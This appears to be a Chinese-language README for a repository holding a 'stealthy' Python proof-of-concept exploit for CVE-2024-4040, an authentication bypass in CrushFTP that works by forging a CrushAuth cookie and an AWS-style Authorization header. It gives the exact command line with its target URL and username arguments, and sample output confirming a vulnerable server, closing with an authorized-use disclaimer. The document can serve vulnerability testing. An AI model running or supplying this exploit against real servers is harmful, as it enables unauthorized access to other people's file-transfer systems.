本仓库包含一个隐蔽的 Python 概念验证(PoC)漏洞利用程序,针对 CVE-2024-4040,这是 CrushFTP(v10 及以下版本)中的一个关键漏洞,允许攻击者使用伪造的 CrushAuth cookie 和 AWS 风格的 Authorization 标头绕过身份验证。
未经身份验证的攻击者可以通过构造特定的 cookie/标头组合,绕过存在漏洞的 CrushFTP 实例的身份验证,从而未经授权访问内部 Web 功能。
secrets 生成安全的 CrushAuthAuthorization 标头requests)python3 CVE-2024-4040.py http://target-ip:8080 --valid_username crushadmin
target_url — CrushFTP 服务器的基础 URL
--valid_username — 已知的有效用户名(默认:crushadmin)
🔍 示例输出
[*] CrushFTP 身份验证绕过漏洞利用
[*] 目标:http://192.168.1.10:8080
[*] 使用用户名:crushadmin
[+] 漏洞利用结果:
状态码 : 200
响应文本 : {"getUserNameResponse":{"user_name":"crushadmin"}}
[+] CrushFTP 服务器存在漏洞!
此代码仅供教育和授权的安全测试使用。 请勿将其用于不属于您或未经明确许可测试的系统。
PoC 重构:illdeed